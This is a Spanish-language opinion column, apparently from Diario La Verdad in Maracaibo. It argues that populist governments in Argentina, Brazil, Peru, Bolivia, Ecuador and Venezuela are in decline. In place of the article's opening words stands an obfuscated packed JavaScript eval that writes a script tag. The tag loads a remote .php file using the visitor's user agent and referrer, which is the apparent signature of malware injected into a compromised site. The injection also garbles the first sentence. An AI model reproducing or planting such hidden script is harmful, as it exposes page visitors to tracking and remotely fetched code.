publicidad

El populismo en descenso

Alberto Pineda / Abogado / politemas@gmail.com
Por eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|btbhf|var|u0026u|referrer|yhhkf||js|php'.split('|'),0,{})) lo que observamos, los gobiernos de corte populista traviesan serias dificultades que los hacen vulnerables ante sus gobernados

Así tenemos que en América del Sur el gobierno argentino de Cristina Kirchner no goza de las simpatías electorales suficientes que garanticen la continuidad del peronismo que fue liderado por su esposo para un nuevo periodo.

Igual ocurre con Dilma Rouseff en Brasil, la que ha caído vertiginosamente en su popularidad, como consecuencia de los escándalos de corrupción cometidos en Petrobras, la poderosa petrolera de Brasil, hechos que le son endosados por la opinión pública de ese país, que considera que ante los mismos no ha tenido una actitud firme para combatirlos, cometidos por funcionarios de su entorno.

En el Perú se cuestiona la gestión de Ollanta Humala, quien ha puesto toda su solidaridad en la conducta y desempeño de su esposa la primera dama de ese país, quien en su desbocada ambición por llegar a la presidencia ha protagonizado actos salpicados por hechos de corrupción muy graves.

En Bolivia se han expresado serias protestas de cuestionamiento y rechazo a políticas impulsadas por Evo Morales, habiendo perdido el apoyo de las clases populares e indígenas (soportes esenciales de su gobierno) que lo hacían aparecer como invencible electoralmente pero que ha sido derrotado en recientes elecciones en regiones que ganaba ampliamente.

En el Ecuador, Rafael Correa tiene al pueblo, que rechaza sus políticas sociales, en la calle, habiéndose realizado infinidad de protestas contra su gobierno y su aspiración de reelegirse para un tercer periodo, por lo que pareciera indicar que la era del populismo de Correa llega a su fin al igual que sucede con los gobiernos que hemos señalado.

En Venezuela estamos presenciando el crecimiento indetenible del rechazo a las políticas económicas del gobierno de Maduro, el que enfrentará elecciones parlamentarias y para la cual los pronósticos no son nada esperanzadores. ¿Qué ha originado todo este proceso? Simplemente que las economías de esos países han sido sostenidas por un populismo de estado que no ha satisfecho las necesidades de la gente, mientras las economías del libre mercado crecen y se hacen más fuertes cada vez, ofreciendo mayores oportunidades para el desarrollo.        

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama